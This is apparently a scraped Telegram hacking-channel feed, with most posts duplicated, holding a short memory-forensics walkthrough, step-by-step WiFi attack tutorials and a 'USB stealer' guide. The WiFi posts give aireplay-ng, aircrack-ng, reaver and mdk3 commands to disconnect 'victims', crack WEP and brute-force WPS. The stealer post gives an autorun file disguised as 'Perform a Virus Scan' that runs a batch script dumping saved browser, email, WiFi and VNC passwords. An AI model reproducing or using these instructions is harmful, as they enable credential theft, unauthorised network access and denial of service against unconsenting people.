Forwarded from Team ETF (Groot)
4. So let's use pstree plugin, which will show the running process in tree format.
And here we can see 2 suspicious process ( guessing as it might be malware )
Vmware-tray
Rick and monty
Because pid of Rick and monty matches with ppid of vmware-tray.
Pid - process id
Ppid - parent Pid
Vmware-tray is common process in vmwares . Name doesn't look suspicious.
Let's check where the file exists.
And here we can see 2 suspicious process ( guessing as it might be malware )
Vmware-tray
Rick and monty
Because pid of Rick and monty matches with ppid of vmware-tray.
Pid - process id
Ppid - parent Pid
Vmware-tray is common process in vmwares . Name doesn't look suspicious.
Let's check where the file exists.
Forwarded from Team ETF (Groot)
5. Let's use filescan module to check where does that actual file exists.
Now we can see that the file doesn't in vmware directory at all. It's in the most common malware directory "tmp".
Now it's sure that it is a virus.
To make sure 100% , dump that file to your device and scan it in the virus total. ( use dumpmem plugin or any suitable to dump ) .
Now we can see that the file doesn't in vmware directory at all. It's in the most common malware directory "tmp".
Now it's sure that it is a virus.
To make sure 100% , dump that file to your device and scan it in the virus total. ( use dumpmem plugin or any suitable to dump ) .
Forwarded from Team ETF (α΄΅ α΅α΅ α΅Κ³α΅α΅α΅)
Shall I make this channel private.
All contents posted here are unique from any other channels in telegram.
All contents posted here are unique from any other channels in telegram.
Anonymous Quiz
67%
Yes
33%
No
Forwarded from Team ETF (α΄΅ α΅α΅ α΅Κ³α΅α΅α΅)
Have a look at our "Team ETF" Channel reviews,
@Team_Etf_reviews
For any queries / doubts contact
@Etf_Zan_bot ( fast reply )
@Zincster ( slow π )
@Team_Etf_reviews
For any queries / doubts contact
@Etf_Zan_bot ( fast reply )
@Zincster ( slow π )
Forwarded from Zincster
Part-01 :-
Wifi cracking :-
Requirements:-
1.Wifi adapter supporting monitor mode ( monitor mode is used to capture packets . Well, normal wifi adapter will be in managed mode in which we usually connect to other devices. )
2. Any OS ( but i recommend Kali linux)
Demonstration:-
To be safe, Change your adapter's Mac address
π§¬ifconfig wlan0 down
π§¬ifconfig wlan0 hw ether 11:22:33:44:55:66
π§¬ifconfig wlan0 up
This method is same to change mac address of any interface ( like wlan0, eth0 etc..)
If you want to change other Mac address of eth0 just replace wlan0 by eth0
Here, first we stopped the interface .
hw -> hardware
And we gave the desired Mac address ( you any give any of 12 digits of same format ) .
And In next step we started the interface.
Monitor mode:-
As I told earlier, every adapter will be managed mode, so you need to change that mode to the monitor mode.
To do this we use airmon-ng
π§¬airmon-ng check kill
π§¬airmon-ng start wlan0
Now if you do ifconfig, wlan0 interface will get changed as mon0 or wlan0mon or by any other name.
Written by :- I am groot [ @Etf_Zan ]
Wifi cracking :-
Requirements:-
1.Wifi adapter supporting monitor mode ( monitor mode is used to capture packets . Well, normal wifi adapter will be in managed mode in which we usually connect to other devices. )
2. Any OS ( but i recommend Kali linux)
Demonstration:-
To be safe, Change your adapter's Mac address
π§¬ifconfig wlan0 down
π§¬ifconfig wlan0 hw ether 11:22:33:44:55:66
π§¬ifconfig wlan0 up
This method is same to change mac address of any interface ( like wlan0, eth0 etc..)
If you want to change other Mac address of eth0 just replace wlan0 by eth0
Here, first we stopped the interface .
hw -> hardware
And we gave the desired Mac address ( you any give any of 12 digits of same format ) .
And In next step we started the interface.
Monitor mode:-
As I told earlier, every adapter will be managed mode, so you need to change that mode to the monitor mode.
To do this we use airmon-ng
π§¬airmon-ng check kill
π§¬airmon-ng start wlan0
Now if you do ifconfig, wlan0 interface will get changed as mon0 or wlan0mon or by any other name.
Written by :- I am groot [ @Etf_Zan ]
Forwarded from Zincster
Part-02 :-
Deauthentication :-
We use this trick to disconnect any user from the network.
First run
π§¬airodump-ng wlan0mon
Now you can see the router's mac bssid and it's channel .
Now, to get all users in that wifi run,
π§¬airodump-ng --channel [_] --bssid [_] wlan0mon
Now you can see all the users on that wifi,
Now use aireplay-ng to disconnect them,
π§¬aireplay-ng --deauth 555555 -a [_] -c [_] wlan0mon
Here,
555555 is number of packets we are sending to the particular victim to disconnect them from router.
-a is router's bssid
-c is victim's Mac, which we got by running airodump-ng.
In case you want to disconnect all clients from the router, then
π§¬aireplay-ng --deauth 55555555 -a [_] wlan0mon
This will disconnect all the clients.
But the effect will be less, means it may take some time to disconnect every client.
Written by :- I am groot [ @Etf_Zan ]
Deauthentication :-
We use this trick to disconnect any user from the network.
First run
π§¬airodump-ng wlan0mon
Now you can see the router's mac bssid and it's channel .
Now, to get all users in that wifi run,
π§¬airodump-ng --channel [_] --bssid [_] wlan0mon
Now you can see all the users on that wifi,
Now use aireplay-ng to disconnect them,
π§¬aireplay-ng --deauth 555555 -a [_] -c [_] wlan0mon
Here,
555555 is number of packets we are sending to the particular victim to disconnect them from router.
-a is router's bssid
-c is victim's Mac, which we got by running airodump-ng.
In case you want to disconnect all clients from the router, then
π§¬aireplay-ng --deauth 55555555 -a [_] wlan0mon
This will disconnect all the clients.
But the effect will be less, means it may take some time to disconnect every client.
Written by :- I am groot [ @Etf_Zan ]
Forwarded from Zincster
Part-03:-
WEP cracking :-
π§¬airodump-ng wlan0mon
As we already know, we get all the router's available now,
π§¬airodump-ng --bssid [_] --channel [_] --write trial
All the steps are same as I told earlier, one change here is we are writing the captured packets in trial file.
π§¬aireplay-ng --fakeauth 0 -a [_] -h [_] wlan0mon
Here,
We are doing fake - authentication.
0 means authentication only once.
-a -> victim's bssid
-h -> your's bssid
π§¬aireplay-ng --arpreply -b [_] -h [_] wlan0mon
After successfully authenticating with the target, we will wait to get the ARP packet, and we will inject that packet to the traffic.
You can see we didn't specify any number after --arpreply as we did earlier in --fakeauth . This is because, we want the process to repeat continuously till we get the enough number of IV's.
-b -> victim's bssid
-h -> your's bssid
IV -> random initialization vector to generate key streams
I forgot to tell earlier that, wep uses RC4 algorithm (24 bits) to encrypt the flow of data.
IV + key(password) = key_stream
Now key_stream will be added to the data to make it unreadable.
Now, we have the captured file (caplet) which we got in first step ( trial )
The file would be created as trial-01.cap
Now, crack it .
π§¬aircrack-ng trial-01.cap
That's it , you will get the key after it has been cracked.
Remember , fake authentication method used for wep only.
Written by :- I am groot [ @Etf_Zan ]
WEP cracking :-
π§¬airodump-ng wlan0mon
As we already know, we get all the router's available now,
π§¬airodump-ng --bssid [_] --channel [_] --write trial
All the steps are same as I told earlier, one change here is we are writing the captured packets in trial file.
π§¬aireplay-ng --fakeauth 0 -a [_] -h [_] wlan0mon
Here,
We are doing fake - authentication.
0 means authentication only once.
-a -> victim's bssid
-h -> your's bssid
π§¬aireplay-ng --arpreply -b [_] -h [_] wlan0mon
After successfully authenticating with the target, we will wait to get the ARP packet, and we will inject that packet to the traffic.
You can see we didn't specify any number after --arpreply as we did earlier in --fakeauth . This is because, we want the process to repeat continuously till we get the enough number of IV's.
-b -> victim's bssid
-h -> your's bssid
IV -> random initialization vector to generate key streams
I forgot to tell earlier that, wep uses RC4 algorithm (24 bits) to encrypt the flow of data.
IV + key(password) = key_stream
Now key_stream will be added to the data to make it unreadable.
Now, we have the captured file (caplet) which we got in first step ( trial )
The file would be created as trial-01.cap
Now, crack it .
π§¬aircrack-ng trial-01.cap
That's it , you will get the key after it has been cracked.
Remember , fake authentication method used for wep only.
Written by :- I am groot [ @Etf_Zan ]
Forwarded from Zincster
Part-04 :-
WPA / WPA2 cracking
( WPS enabled )
WPA -> TKIP encryption
WPA2 -> CCMP encryption
Remember the encryption used in WEP -> RC4 algorithm
To see all the wps enabled routers,
We use wash tool,
π§¬wash -i wlan0mon
i -> interface
π§¬aireplay-ng --fakeauth 100 -a [_] -h [_]
-a -> victim's Mac
-h -> your's Mac
You may get doubt, why we have used 50 here, that's because we need to associate with target network for every 50 seconds.
Now, to bruteforce we use tool called reaver,
π§¬reaver --bssid [_] --channel [_] -i wlan0mon -A -N -vvv
-A -> we are telling to not to associate with the target.
-N -> we are telling for no-nacks to authenticate.
-vvv -> it's called verbose level,
If you have used nmap you will be well aware of this.
If some router's blocks you,
Means like in some websites login if you enter wrong passwords it will block you.
So for this, we will use tool called mdk3 which will use different Mac address while connection. ( like we use different VPN's to change our ip )
π§¬mdk3 wlan0mon a -a [_]
a -> it is a test mode which is DOS mode here
-a -> victim's Mac
That's it.....
Written by :- I am groot [ @Etf_Zan ]
WPA / WPA2 cracking
( WPS enabled )
WPA -> TKIP encryption
WPA2 -> CCMP encryption
Remember the encryption used in WEP -> RC4 algorithm
To see all the wps enabled routers,
We use wash tool,
π§¬wash -i wlan0mon
i -> interface
π§¬aireplay-ng --fakeauth 100 -a [_] -h [_]
-a -> victim's Mac
-h -> your's Mac
You may get doubt, why we have used 50 here, that's because we need to associate with target network for every 50 seconds.
Now, to bruteforce we use tool called reaver,
π§¬reaver --bssid [_] --channel [_] -i wlan0mon -A -N -vvv
-A -> we are telling to not to associate with the target.
-N -> we are telling for no-nacks to authenticate.
-vvv -> it's called verbose level,
If you have used nmap you will be well aware of this.
If some router's blocks you,
Means like in some websites login if you enter wrong passwords it will block you.
So for this, we will use tool called mdk3 which will use different Mac address while connection. ( like we use different VPN's to change our ip )
π§¬mdk3 wlan0mon a -a [_]
a -> it is a test mode which is DOS mode here
-a -> victim's Mac
That's it.....
Written by :- I am groot [ @Etf_Zan ]
Forwarded from Team ETF (α΄΅ α΅α΅ α΅Κ³α΅α΅α΅)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Team ETF (Groot γβ
π½πβ
γ)
Forwarded from BLACK HAT KINGDOM
ββπ°HOW TO MAKE A USB STEALERπ°
βΌοΈTUTORIAL:
open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf
open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat
copy the autorun and launch file to your USB
go to http://www.nirsoft.net/ and download the programs named in step 2
extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB
click on the option perform a virus scan
(this is an example, if you want it to say something else go to the autorun file and change it ;) )
go to my computerβ-> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE: this only recovers passwords that have once been saved on your computer
β @BLACKHAT_BEAST β
βΌοΈTUTORIAL:
open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf
open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat
copy the autorun and launch file to your USB
go to http://www.nirsoft.net/ and download the programs named in step 2
extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB
click on the option perform a virus scan
(this is an example, if you want it to say something else go to the autorun file and change it ;) )
go to my computerβ-> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE: this only recovers passwords that have once been saved on your computer
β @BLACKHAT_BEAST β
